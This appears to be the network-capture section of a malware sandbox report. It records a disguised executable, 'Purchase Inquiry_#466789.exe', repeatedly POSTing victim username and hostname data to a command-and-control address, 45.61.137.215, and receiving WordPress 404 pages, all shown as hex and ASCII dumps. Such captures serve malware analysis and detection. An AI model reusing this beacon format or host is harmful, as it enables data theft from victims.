                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:19.619787931 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:19.619818926 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:19.619853020 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:19.620021105 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:19.620078087 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:19.620126009 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:19.620160103 CEST1236INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b
                  Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
                  May 27, 2024 08:32:19.620192051 CEST1236INData Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79
                  Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.44974945.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:19.874041080 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:19.879292011 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:22.064448118 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:20 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:22.064482927 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:22.064497948 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:22.064508915 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:32:22.064517975 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:32:22.064528942 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:32:22.064569950 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:22.064618111 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                  May 27, 2024 08:32:22.064627886 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                  May 27, 2024 08:32:22.064636946 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                  Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.44975145.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:22.292984009 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:22.297985077 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:24.463984966 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:22 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:24.463994980 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:32:24.464036942 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:32:24.464056015 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:32:24.464066982 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:32:24.464122057 CEST1236INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:32:24.464132071 CEST1236INData Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31
                  Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
                  May 27, 2024 08:32:24.464143038 CEST1120INData Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72
                  Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
                  May 27, 2024 08:32:24.464265108 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:32:24.464282990 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.44975245.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:24.621009111 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:24.626135111 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:26.752924919 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:25 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
